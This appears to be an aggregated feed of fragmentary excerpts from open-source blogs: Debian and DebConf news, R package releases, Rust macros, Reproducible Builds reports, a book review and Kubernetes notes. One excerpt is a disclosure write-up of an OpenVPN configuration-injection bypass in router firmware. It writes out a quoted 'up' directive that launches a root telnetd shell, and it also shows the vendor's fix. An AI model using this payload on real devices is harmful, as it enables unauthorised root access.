Jonathan Dowland: printables.com feed

- trending - https://dyn.tedder.me/rss/printables/trending.json
- top rated - https://dyn.tedder.me/rss/printables/top_rated.json
- top downloads - https://dyn.tedder.me/rss/printables/top_downloads.json
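Since these are JSON feeds, they are easy to inspect from the command line; for example (assuming the feeds follow the JSON Feed convention of an items array with title fields, and that curl and jq are available):

# print the titles of the currently trending models
$ curl -s https://dyn.tedder.me/rss/printables/trending.json | jq -r '.items[].title'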
The idea for this logo came from the city's landscape, the place where the medieval tower looks over the river that meets the sea, almost like guarding it. The Debian red swirl comes out of the blue water splash as a continuous stroke, and they are also the French flag colours. I tried to combine elements from the city when I was sketching in the notebook, which is an important step for me as I feel that ideas flow much more easily, but the swirl + water with the tower was the most refreshing combination, so I jumped to the computer to design it properly. The water bit was the most difficult element, and I used the Debian swirl as a base for it, so both would look consistent. The city name font is a modern calligraphy style and the overall composition is not symmetric but balanced with the different elements. I am glad that the Debian community felt represented with this logo idea!

Congratulations, Juliana, and thank you very much for your contribution to Debian!

The DebConf25 Team would like to take this opportunity to remind you that DebConf, the annual international Debian Developers Conference, needs your help. If you want to help with the DebConf 25 organization, don't hesitate to reach out to us via the #debconf-team channel on OFTC.

Furthermore, we are always looking for sponsors. DebConf is run on a non-profit basis, and all financial contributions allow us to bring together a large number of contributors from all over the globe to work collectively on Debian. Detailed information about the sponsorship opportunities is available on the DebConf 25 website.

See you in Brest!
> RcppUUID::uuid_generate_time(5)
[1] "0194d8fa-7add-735c-805b-6bbf22b78b9e" "0194d8fa-7add-735e-8012-3e0e53895b19"
[3] "0194d8fa-7add-735e-81af-bc67bb435ade" "0194d8fa-7add-735e-82b1-405bf57963ad"
[5] "0194d8fa-7add-735f-801e-efe57078b2e7"
>
…clock object, I am not aware of a text parser, so there is currently no inverse function (as ulid offers) for the character representation.
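To generate a few more of these from the shell (assuming R and the RcppUUID package are installed):

$ Rscript -e 'RcppUUID::uuid_generate_time(3)'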
The NEWS entry for the two releases follows.
Courtesy of my CRANberries, there is also a diffstat report. More detailed information is on the RcppUUID page, or the github repo.

Changes in version 1.2.0 (2025-02-12)

- Time-based UUIDs, i.e. version 7, can now be generated (requiring Boost 1.86 or newer as in the current BH package)

Changes in version 1.1.2 (2025-01-31)

- New maintainer to resurrect package on CRAN
This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can sponsor me at GitHub.
Where /etc/rc.d/init.d/openvpn previously did

echo "$(nvram get 8460)" | sed 's/;/\n/g' >> ${CONF_FILE}

it now runs

echo "$(nvram get 8460)" | sed -e 's/;/\n/g' | sed -e '/script-security/d' -e '/^[ ]*down /d' -e '/^[ ]*up /d' -e '/^[ ]*learn-address /d' -e '/^[ ]*tls-verify /d' -e '/^[ ]*client-[dis]*connect /d' -e '/^[ ]*route-up/d' -e '/^[ ]*route-pre-down /d' -e '/^[ ]*auth-user-pass-verify /d' -e '/^[ ]*ipchange /d' >> ${CONF_FILE}

removing all lines that contain script-security or start with a set of options that allow command execution.
Looking at the OpenVPN configuration template (/etc/openvpn/openvpn.conf), it already uses up and therefore sets script-security 2, so injecting that is unnecessary. Thus, if one can somehow inject "/bin/ash -c 'telnetd -l /bin/sh -p 1271'" into one of the command-executing options, a shell listening on port 1271 will be opened.
The filtering looks for lines that start with zero or more spaces, followed by the option name (up, down, etc.), followed by another space. While OpenVPN happily accepts tabs instead of spaces in the configuration file, I wasn't able to inject a tab either via the web interface or via SSH/gs_config.
However, OpenVPN also allows quoting, which is only documented for parameters, but works just as well for option names too. That means that instead of

up "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"

one can write

"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"

/etc/rc.d/init.d/openvpn won't catch it and the resulting OpenVPN configuration will include the exploit:
# grep -E '(up|script-security)' /etc/openvpn.conf
up /etc/openvpn/openvpn.up
up-restart
;group nobody
script-security 2
"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
/ # uname -a
Linux HT8XXV2 4.4.143 #108 SMP PREEMPT Mon May 13 18:12:49 CST 2024 armv7l GNU/Linux
/ # id
uid=0(root) gid=0(root)
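The bypass is easy to reproduce locally with a minimal re-creation of the filter (just the up rule from the sed expression above): the unquoted line matches '^[ ]*up ' and is deleted, while the quoted variant starts with '"' and sails through.

$ printf 'up /tmp/a\n"up" /tmp/a\n' | sed -e '/^[ ]*up /d'
"up" /tmp/a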
In the fixed firmware, /etc/rc.d/init.d/openvpn looks very similar, according to firmware dumps:

echo "$(nvram get 8460)" | sed -e 's/;/\n/g' | \
    sed -e '/script-security/d' \
        -e '/^["'\'' \f\v\r\n\t]*down["'\'' \f\v\r\n\t]/d' \
        -e '/^["'\'' \f\v\r\n\t]*up["'\'' \f\v\r\n\t]/d' \
        -e '/^["'\'' \f\v\r\n\t]*learn-address["'\'' \f\v\r\n\t]/d' \
        -e '/^["'\'' \f\v\r\n\t]*tls-verify["'\'' \f\v\r\n\t]/d' \
        -e '/^["'\'' \f\v\r\n\t]*tls-crypt-v2-verify["'\'' \f\v\r\n\t]/d' \
        -e '/^["'\'' \f\v\r\n\t]*client-[dis]*connect["'\'' \f\v\r\n\t]/d' \
        -e '/^["'\'' \f\v\r\n\t]*route-up["'\'' \f\v\r\n\t]/d' \
        -e '/^["'\'' \f\v\r\n\t]*route-pre-down["'\'' \f\v\r\n\t]/d' \
        -e '/^["'\'' \f\v\r\n\t]*auth-user-pass-verify["'\'' \f\v\r\n\t]/d' \
        -e '/^["'\'' \f\v\r\n\t]*ipchange["'\'' \f\v\r\n\t]/d' >> ${CONF_FILE}
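A quick check with the same local re-creation confirms that the new character class, which also matches a leading double quote, now catches the quoted variant:

# no output: the quoted line is deleted too
$ printf '"up" /tmp/a\n' | sed -e '/^["'\'' \f\v\r\n\t]*up["'\'' \f\v\r\n\t]/d'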
…macro_rules; and its convenience and simplicity, compared to proc macros.

Programmers coming to Rust from scripting languages will appreciate derive-deftly's convenient automatic code generation, which works as a kind of compile-time introspection.

Rust's two main macro systems

I'm often a fan of metaprogramming, including macros. They can help remove duplication and flab, which are often the enemy of correctness.

Rust has two macro systems. derive-deftly offers much of the power of the more advanced (proc_macros), while beating the simpler one (macro_rules) at its own game for ease of use.
(Side note: Rust has at least three other ways to do metaprogramming: generics; build.rs; and multiple module inclusion via #[path=]. These are beyond the scope of this blog post.)
macro_rules!

macro_rules!, aka "pattern macros", "declarative macros", or sometimes "macros by example", are the simpler kind of Rust macro. They involve writing a sort-of-BNF pattern-matcher, and a template which is then expanded with substitutions from the actual input. If your macro wants to accept comma-separated lists, or other simple kinds of input, this is OK. But often we want to emulate a #[derive(...)] macro: e.g., to define code based on a struct, handling each field. Doing that with macro_rules! is very awkward:
macro_rules!'s pattern language doesn't have a cooked way to match a data structure, so you have to hand-write a matcher for Rust syntax, in each macro. Writing such a matcher is very hard in the general case, because macro_rules! lacks features for matching important parts of Rust syntax (notably, generics). (If you really need to, there's a horrible technique as a workaround.)
And, the invocation syntax for the macro is awkward: you must enclose the whole of the struct in my_macro!. This makes it hard to apply more than one macro to the same struct, and produces rightward drift.
Enclosing the struct this way means the macro must reproduce its input - so it can have bugs where it mangles the input, perhaps subtly. This also means the reader cannot be sure precisely whether the macro modifies the struct itself. In Rust, the types and data structures are often the key places to go to understand a program, so this is a significant downside.
macro_rules! has various other weird deficiencies too specific to list here.

Overall, compared to (say) the C preprocessor, it's great, but programmers used to the power of Lisp macros, or (say) metaprogramming in Tcl, will quickly become frustrated.
proc macros

Rust's second macro system is much more advanced. It is a fully general system for processing and rewriting code. The macro's implementation is Rust code, which takes the macro's input as arguments, in the form of Rust tokens, and returns Rust tokens to be inserted into the actual program.

This approach is more similar to Common Lisp's macros than to most other programming languages' macro systems. It is extremely powerful, and is used to implement many very widely used and powerful facilities. In particular, proc macros can be applied to data structures with #[derive(...)]. The macro receives the data structure, in the form of Rust tokens, and returns the code for the new implementations, functions etc.
This is used very heavily in the standard library for basic features like #[derive(Debug)] and Clone, and for important libraries like serde and strum.
But, it is a complete pain in the backside to write and maintain a proc_macro.
The Rust types and functions you deal with in your macro are very low level. You must manually handle every possible case, with runtime conditions and pattern-matching. Error handling and recovery is so nontrivial that there are macro-writing libraries and even more macros to help. Unlike a Lisp codewalker, a Rust proc macro must deal with Rust's highly complex syntax. You will probably end up dealing with syn, which is a complete Rust parsing library, separate from the compiler; syn is capable and comprehensive, but a proc macro must still contain a lot of often-intricate code.

There are build/execution environment problems. The proc_macro code can't live with your application; you have to put the proc macros in a separate cargo package, complicating your build arrangements. The proc macro package environment is weird: you can't test it separately, without jumping through hoops. Debugging can be awkward. Proper tests can only realistically be done with the help of complex additional tools, and will involve a pinned version of Nightly Rust.
derive-deftly to the rescue
derive-deftly lets you write a #[derive(...)] macro, driven by a data structure, without wading into any of that stuff. Your macro definition is a template in a simple syntax, with predefined $-substitutions for the various parts of the input data structure.
Example
Here's a real-world example from a personal project:

define_derive_deftly! {
    export UpdateWorkerReport:

    impl $ttype {
        pub fn update_worker_report(&self, wr: &mut WorkerReport) {
            $(
                ${when fmeta(worker_report)}
                wr.$fname = Some(self.$fname.clone()).into();
            )
        }
    }
}

#[derive(Debug, Deftly, Clone)]
...
#[derive_deftly(UiMap, UpdateWorkerReport)]
pub struct JobRow {
    ...
    #[deftly(worker_report)]
    pub status: JobStatus,
    pub processing: NoneIsEmpty<ProcessingInfo>,
    #[deftly(worker_report)]
    pub info: String,
    pub duplicate_of: Option<JobId>,
}
This is a nice example, also, of how using a macro can avoid bugs. Implementing this update by hand without a macro would involve a lot of cut-and-paste. When doing that cut-and-paste it can be very easy to accidentally write bugs where you forget to update some parts of each of the copies:

pub fn update_worker_report(&self, wr: &mut WorkerReport) {
    wr.status = Some(self.status.clone()).into();
    wr.info = Some(self.status.clone()).into();
}

Spot the mistake? We copy status to info. Bugs like this are extremely common, and not always found by the type system. derive-deftly can make it much easier to make them impossible.
Special-purpose derive macros are now worthwhile!
Because of the difficult and cumbersome nature of proc macros, very few projects have site-specific, special-purpose #[derive(...)] macros.
The Arti codebase has no bespoke proc macros, across its 240kloc and 86 crates. (We did fork one upstream proc macro package to add a feature we needed.) I have only one bespoke, case-specific, proc macro amongst all of my personal Rust projects; it predates derive-deftly.
Since we have started using derive-deftly in Arti, it has become an important tool in our toolbox. We have 37 bespoke derive macros, done with derive-deftly. Of these, 9 are exported for use by downstream crates. (For comparison there are 176 macro_rules macros.)
In my most recent personal Rust project, I have 22 bespoke derive macros, done with derive-deftly, and 19 macro_rules macros.
derive-deftly macros are easy and straightforward enough that they can be used as readily as macro_rules macros. Indeed, they are often clearer than a macro_rules macro.
Stability without stagnation
derive-deftly is already highly capable, and can solve many advanced problems.
It is mature software, well tested, with excellent documentation, comprising both comprehensive reference material and the walkthrough-structured user guide.
But declaring it 1.0 doesn't mean that it won't improve further.

Our ticket tracker has a laundry list of possible features. We'll sometimes be cautious about committing to these, so we've added a beta feature flag, for opting in to less-stable features, so that we can prototype things without painting ourselves into a corner. And, we intend to further develop the Guide.

Tired of waiting for apt to finish installing packages? Wish there were a way to make your installations blazingly fast without caring about minor things like, oh, data integrity? Well, today is your lucky day! apt-eatmydata is now available for Debian and all supported Ubuntu releases!
If you've ever used libeatmydata, you know it's a nifty little hack that disables fsync() and friends, making package installations way faster by skipping unnecessary disk writes. Normally, you'd have to remember to wrap apt commands manually, like this:

$ eatmydata apt install texlive-full

But who has time for that?
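(Under the hood, eatmydata is an LD_PRELOAD shim that turns fsync() and friends into no-ops, so the wrapper above is roughly equivalent to the following; the exact library name and path vary by distribution:)

$ sudo LD_PRELOAD=libeatmydata.so apt install texlive-full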
apt-eatmydata takes care of this automagically by integrating eatmydata seamlessly into apt itself! That means every package install is now turbocharged, no extra typing required:

$ sudo apt install apt-eatmydata

There is also a PPA bringing apt-eatmydata to all supported Ubuntu releases. Just add this PPA and install:

$ sudo add-apt-repository ppa:firebuild/apt-eatmydata
$ sudo apt install apt-eatmydata

And boom! Your apt install times are getting a serious upgrade. Let's run some tests:
# pre-download package to measure only the installation
$ sudo apt install -d linux-headers-6.8.0-53-lowlatency
...
# installation time is 9.35s without apt-eatmydata:
$ sudo time apt install linux-headers-6.8.0-53-lowlatency
...
2.30user 2.12system 0:09.35elapsed 47%CPU (0avgtext+0avgdata 174680maxresident)k
32inputs+1495216outputs (0major+196945minor)pagefaults 0swaps
$ sudo apt install apt-eatmydata
...
$ sudo apt purge linux-headers-6.8.0-53-lowlatency
# installation time is 3.17s with apt-eatmydata:
$ sudo time eatmydata apt install linux-headers-6.8.0-53-lowlatency
2.30user 0.88system 0:03.17elapsed 100%CPU (0avgtext+0avgdata 174692maxresident)k
0inputs+205664outputs (0major+198099minor)pagefaults 0swaps
apt-eatmydata just made installing Linux headers 3x faster!

…what apt-eatmydata does, just setting it up in less than a second! Check it out here:

apt-eatmydata is not for all production environments. If your system crashes mid-install, you might end up with a broken package database. But for throwaway VMs, containers, and CI pipelines? It's an absolute game-changer. I use it on my laptop, too. So go forth and install recklessly fast!

qtpaths6 for cross compilation, by Helmut Grohne
While Qt5 used to use qmake to query installation properties, Qt6 is moving more and more to CMake and, to ease that transition, it relies more on qtpaths. Since this tool is not naturally aware of the architecture it is called for, it tends to produce results for the build architecture. Therefore, more than 100 packages were picking up a multiarch directory for the build architecture during cross builds. In collaboration with the Qt/KDE team and Sandro Knauß in particular (none affiliated with Freexian), we added an architecture-specific wrapper script in the same way qmake has one for Qt5 and Qt6 already. The relevant CMake module has been updated to prefer the triplet-prefixed wrapper. As a result, most of the KDE packages now cross build on unstable, ready in time for the trixie release.
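For illustration, such a triplet-prefixed wrapper can be a one-line shell script that points the generic tool at an architecture-specific qt.conf. The following is a hypothetical sketch (the tool path, option spelling and qt.conf location are all assumptions; the actual Debian wrapper may differ):

#!/bin/sh
# hypothetical /usr/bin/aarch64-linux-gnu-qtpaths6: answer queries for the
# host architecture instead of the build architecture
exec /usr/bin/qtpaths6 --qtconf /usr/lib/aarch64-linux-gnu/qt6/qt.conf "$@"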
/usr-move, by Helmut Grohne

In December, Emil Södergren reported that a live-build was not working for him and, in January, Colin Watson reported that the proposed mitigation for debian-installer-utils would practically fail. Both failures were to be attributed to a wrong understanding of implementation-defined behavior in dpkg-divert. As a result, all M18 mitigations had to be reviewed and many of them replaced. Many have been uploaded already and all instances have received updated patches.
Even though dumat has been in operation for more than a year, it gained recent changes. For one thing, analysis of architectures other than amd64 was requested. Chris Hofstaedtler (not affiliated with Freexian) kindly provided computing resources for repeatedly running it on the larger set. Doing so revealed various cross-architecture undeclared file conflicts in gcc, glibc, and binutils-z80, but it also revealed a previously unknown /usr-move issue in rpi.rpi-common. On top of that, dumat produced false positive diagnostics and wrongly associated Debian bugs in some cases, both of which have now been fixed. As a result, a supposedly fixed python3-sepolicy issue had to be reopened.
Building a binutils cross toolchain would result in a binutils-for-host package that would not be practically installable, as it would depend on a binutils-common package that was not built. This turned into an examination of binutils-common and noticing that it actually differed across architectures even though it should not. Johannes Schauer Marin Rodrigues (not affiliated with Freexian) and Colin Watson kindly helped brainstorm possible solutions. Eventually, Helmut provided a patch to move the gprofng bits out of binutils-common. Independently, Matthias Klose (not affiliated with Freexian) split out binutils-gold into a separate source package. As a result, binutils-common is now equal across architectures and can be marked Multi-Arch: foreign, resolving the initial problem.
…build image was merged, making it easier to test !569 with external projects. Santiago used a fork of the debusine repo to try the draft !569, and some issues were spotted, and part of them fixed. This is the last debusine pipeline run with the current !569: https://salsa.debian.org/santiago/debusine/-/pipelines/794233.

One of the last improvements relates to how to enable projects to customize the pipeline, in a way equivalent to what they currently do in the extract-source and build jobs. While this is work in progress, the results are rather promising. Next steps include deciding on introducing schroot support for bookworm, bookworm-security, and older releases, as is done on the official Debian buildds.
- … python3-tk package.
- … re2 package, allowing for the use of the Google RE2 regular expression library as a direct replacement for the standard library re module.
- … python-ring-doorbell and python-asyncclick.
- … po-debconf translations to Catalan: reviewed 44 packages and submitted translations to 90 packages (via salsa merge requests or bugtracker bugs).
- … po-debconf-manager with small fixes.
- … zim, a nice desktop wiki that is very handy to organize your day-to-day digital life, to the latest upstream version (0.76).
- … libtool, opensysusers and virtualbox.
- … brlaser.
- … (telepathy-glib, xorg, xserver-xorg-video-vesa, apitrace, mesa).

Series: Finder Chronicles #3
Publisher: DAW
Copyright: 2021
ISBN: 0-7564-1516-0
Format: Kindle
Pages: 458
SANTO'S, the sign read. Under it, in smaller letters, was CURIOSITIES AND INCONVENIENCES FOR COMMENDABLE SUMS. "Inconveniences sound just like my thing," Fergus said. "You two want to wait in the car while I check it out?" "Oh, no, I am not missing this," Isla said, and got out of the podcar. "I am uncertain," Ignatio said. "I would like some curiouses, but not any inconveniences. Please proceed while I decide, and if there is also murdering or calamity or raisins, you will yell right away, yes?"

Also, if your story setup requires a partly-understood alien artifact that the protagonist can get some explanations for but not have the mystery neatly solved for them, Ignatio's explanations are perfect.
"It is a door. A doorbell. A... peephole? A key. A control light. A signal. A stop-and-go sign. A road. A bridge. A beacon. A call. A map. A channel. A way," Ignatio said. "It is a problem to explain. To say a doorkey is best, and also wrong. If put together, a path may be opened." "And then?" "And then the bad things on the other side, who we were trying to lock away, will be free to travel through."Second, the thing about Palmer's writing that continues to impress me is her ability to take a standard science fiction plot, one whose variations I've read probably dozens of times before, and still make it utterly engrossing. This book is literally a fetch quest. There are a bunch of scattered fragments, Fergus has to find them and keep them from being assembled, various other people are after the same fragments, and Fergus either has to get there first or get the fragments back from them. If you haven't read this book before, you've played the video game or watched the movie. The threat is basically a Stargate SG-1 plot. And yet, this was so much fun. The characters are great. This book leans less on found family than the last one and a bit more on actual family. When I started reading this series, Fergus felt a bit bland in the way that adventure protagonists sometimes can, but he's fleshed out nicely as the series goes along. He's not someone who tends to indulge in big emotions, but now the reader can tell that's because he's the kind of person who finds things to do in order to keep from dwelling on things he doesn't want to think about. He's unflappable in a quietly competent way while still having a backstory and emotional baggage and a rich inner life that the reader sees in glancing fragments. We get more of Fergus's backstory, particularly around Mars, but I like that it's told in anecdotes and small pieces. The last thing Fergus wants to do is wallow in his past trauma, so he doesn't and finds something to do instead. There's just enough detail around the edges to deepen his character without turning the book into a story about Fergus's emotions and childhood. It's a tricky balancing act that Palmer handles well. There are also more sentient ships, and I am so in favor of more sentient ships.
"When I am adding a new skill, I import diagnostic and environmental information specific to my platform and topology, segregate the skill subroutines to a dedicated, protected logical space, run incremental testing on integration under all projected scenarios and variables, and then when I am persuaded the code is benevolent, an asset, and provides the functionality I was seeking, I roll it into my primary processing units," Whiro said. "You cannot do any of that, because if I may speak in purely objective terms you may incorrectly interpret as personal, you are made of squishy, unreliable goo."We get the normal pieces of a well-done fetch quest: wildly varying locations, some great local characters (the US-based trauma surgeons on vacation in Australia were my favorites), and believable antagonists. There are two other groups looking for the fragments, and while one of them is the standard villain in this sort of story, the other is an apocalyptic cult whose members Fergus mostly feels sorry for and who add just the right amount of surreality to the story. The more we find out about them, the more believable they are, and the more they make this world feel like realistic messy chaos instead of the obvious (and boring) good versus evil patterns that a lot of adventure plots collapse into. There are things about this book that I feel like I should be criticizing, but I just can't. Fetch quests are usually synonymous with lazy plotting, and yet it worked for me. The way Fergus gets dumped into the middle of this problem starts out feeling as arbitrary and unmotivated as some video game fetch quest stories, but by the end of the book it starts to make sense. The story could arguably be described as episodic and cliched, and yet I was thoroughly invested. There are a few pacing problems at the very end, but I was too invested to care that much. This feels like a book that's better than the sum of its parts. Most of the story is future-Earth adventure with some heist elements. The ending goes in a rather different direction but stays at the center of the classic science fiction genre. The Scavenger Door reaches a satisfying conclusion, but there are a ton of unanswered questions that will send me on to the fourth (and reportedly final) novel in the series shortly. This is great stuff. It's not going to win literary awards, but if you're in the mood for some classic science fiction with fun aliens and neat ideas, but also benefiting from the massive improvements in characterization the genre has seen in the past forty years, this series is perfect. Highly recommended. Followed by Ghostdrift. Rating: 9 out of 10
Participants were offered token compensation for their participation.

Seems like Dimensional Research, the company that did that survey, screwed up badly.
Courtesy of my CRANberries, there is a diffstat report relative to the previous release. More detailed information is on the RcppArmadillo page. Questions, comments etc. should go to the rcpp-devel mailing list off the Rcpp R-Forge page.

Changes in RcppArmadillo version 14.2.3-1 (2025-02-05)

- Upgraded to Armadillo release 14.2.3 (Smooth Caffeine)
- Minor fix for declaration of xSYCON and xHECON functions in LAPACK
- Fix for rare corner-case in reshape()

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. If you like this or other open-source work I do, you can sponsor me at GitHub.
On SteamOS, the /etc directory is not part of the root filesystem itself. Instead, it's a writable overlay and all modifications are actually stored under /var (together with all the usual contents that go in that filesystem, such as logs, cached data, etc).

/etc contains important data that is specific to that particular machine, like the configuration of known network connections, the password of the main user and the SSH keys. This configuration needs to be kept after an OS update so the system can keep working as expected. However, the update process also needs to make sure that other changes to /etc don't conflict with whatever is available in the new version of the OS, and there have been issues due to some modifications unexpectedly persisting after a system update.

SteamOS 3.6 introduced a new mechanism to decide what to keep after an OS update, and the system now keeps a list of configuration files that are allowed to be kept in the new version. The idea is that only the modifications that are known to be important for the correct operation of the system are applied, and everything else is discarded.

However, many users want to be able to keep additional configuration files after an OS update, either because the changes are important for them or because those files are needed for some third-party tool that they have installed. Fortunately, the system provides a way to do that, and users (or developers of third-party tools) can add a configuration file to /etc/atomic-update.conf.d, listing the additional files that need to be kept. There is an example in /etc/atomic-update.conf.d/example-additional-keep-list.conf that shows what this configuration looks like.
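For instance, a third-party tool could ship a drop-in like the following (a hypothetical sketch: the file name and entries are made up, and the exact syntax should be checked against the example file mentioned above):

# /etc/atomic-update.conf.d/my-tool-keep-list.conf (hypothetical)
# extra files under /etc to keep across OS updates
/etc/my-tool/my-tool.conf
/etc/my-tool/keys/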
…arm64, armhf and riscv64.
[We] identified that with relatively straightforward infrastructure configuration and patching of build tools, we can achieve very high rates of reproducible builds in all studied ecosystems. We conclude that if the ecosystems adopt our suggestions, the build process of published packages can be independently confirmed for nearly all packages without individual developer actions, and doing so will prevent significant future software supply chain attacks.

The entire PDF is available online to view.
In this work, we perform the first large-scale study of bitwise reproducibility, in the context of the Nix functional package manager, rebuilding 709,816 packages from historical snapshots of the nixpkgs repository[. We] obtain very high bitwise reproducibility rates, between 69 and 91% with an upward trend, and even higher rebuildability rates, over 99%. We investigate unreproducibility causes, showing that about 15% of failures are due to embedded build dates. We release a novel dataset with all build statuses, logs, as well as full diffoscopes: recursive diffs of where unreproducible build artifacts differ.
As above, the entire PDF of the article is available to view online.
…the SOURCE_DATE_EPOCH environment variable and testing, which generated a number of replies.
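(SOURCE_DATE_EPOCH is the Reproducible Builds convention for pinning timestamps embedded in build outputs to a fixed value; a typical invocation, here using the last git commit date as the fixed point, looks like this:)

# pin embedded timestamps to the date of the last commit
$ export SOURCE_DATE_EPOCH=$(git log -1 --pretty=%ct)
$ make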
…making ext4 filesystem images reproducible. Adithya's issue is that even the smallest amount of post-processing of the filesystem results in the modification of the Last mount and Last write timestamps.
FUSE (Filesystem in USErspace) filesystems such as disorderfs do not delete files from the underlying filesystem when they are deleted from the overlay. This can cause seemingly straightforward tests (for example, cases that expect directory contents to be empty after deletion is requested for all files listed within them) to fail.
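A sketch of that failure mode from the shell (assuming disorderfs is installed; directory names are illustrative):

$ mkdir src mnt && touch src/a
$ disorderfs src mnt
$ rm mnt/a   # deleted from the overlay...
$ ls src     # ...but, with the behaviour described above, 'a' is still listed here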
- Komikku (nocheck)
- abseil-cpp (race)
- dunst (date)
- eclipse-egit (jar-mtime, minor)
- exaile (race)
- gawk (bug)
- gimp3 (png date)
- intel (ASLR)
- ioquake3 (debugsource contains date and time)
- joker (sort)
- libchardet
- llama.cpp (random)
- llama.cpp (-march=native-related issue)
- nethack (race)
- netrek-client-cow (date)
- nvidia-modprobe (date)
- nvidia-persistenced (date)
- obs-build (toolchain bug, mis-parses changelog)
- perl-libconfigfile (race)
- pgvector (CPU)
- python-Django4 (FTBFS-2038)
- python-python-datamatrix (FTBFS)
- qore-ssh2-module (GIGO-bug)
- rpm (UID in cpio header from rpmbuild)
- zig (CPU-related issue)
- uki-tool (toolchain)
- cargo-packaging/rusty_v8 (upstream toolchain bugfix)

…versions 285, 286 and 287 to Debian:
- Add a --css command-line argument to prevent a potential Cross-site scripting (XSS) attack. Thanks to Daniel Schmidt from SRLabs for the report.
- … pyexpat.
- … specialize(…) before we've checked that the files are identical or not.
- … cbfstool extraction failed.
- Use the surrogateescape mechanism to avoid a UnicodeDecodeError and crash when decoding any zipinfo output that is not UTF-8 compliant.
- … iso9660.py.
- … Config().force_details; no need for an additional variable in this particular method.
- … the Difference.check_for_ordering_differences method.
- … .tar-like archive format.

Lastly, Vagrant Cascadian updated diffoscope in GNU Guix to versions 285 and 286.
strip-nondeterminism version 1.14.1-1 was uploaded to Debian unstable by Chris Lamb, making the following changes:

- Clarify the --verbose and non --verbose output of bin/strip-nondeterminism so we don't imply we are normalizing files that we are not.
- … SOURCE_DATE_EPOCH documentation.
- … README to make the setup command copy & paste friendly.

- … armhf architecture.
- … arm64 architecture.
- … riscv64 architecture.
- … i386 builder to the osuosl5 node.
- … amd64 worker to the osuosl4 node.
- … debrebuild script under nice.
- … TMPDIR when calling debrebuild.
You can get in touch with the Reproducible Builds project via #reproducible-builds on irc.oftc.net, or via the rb-general@lists.reproducible-builds.org mailing list.
…k8s-scheduled-volume-snapshotter to limit the number of snapshots done in a single cron run (see the add maxSnapshotCount parameter pull request). In prod, we used the modified snapshotter to trigger snapshots one by one.
Even with all previous snapshots cleaned up, we could not trigger a single new snapshot without being throttled. Then I found the useDataPlaneAPI parameter in the CSI file driver. That was it! Setting useDataPlaneAPI: "true" in our VolumeSnapshotClass manifest was the right solution. This indeed solved the throttling issue in our prod cluster.
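For reference, a minimal sketch of such a manifest, applied with kubectl (the class name is made up; file.csi.azure.com is assumed to be the Azure Files CSI driver in use; only the useDataPlaneAPI parameter comes from the fix described above):

$ kubectl apply -f - <<EOF
apiVersion: snapshot.storage.k8s.io/v1
kind: VolumeSnapshotClass
metadata:
  name: azurefile-snapclass   # hypothetical name
driver: file.csi.azure.com
deletionPolicy: Delete
parameters:
  useDataPlaneAPI: "true"     # the setting that stopped the throttling
EOF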
…with the az command. I indeed had a lot of snapshots, a lot of them dated Jan 19 and 20. There was often a new bogus snapshot created every minute. These were created during the first attempt at fixing the throttling issue. I guess that even though the CSI file driver was throttled, a snapshot was still created in the storage account, but the CSI driver did not see it and retried a minute later.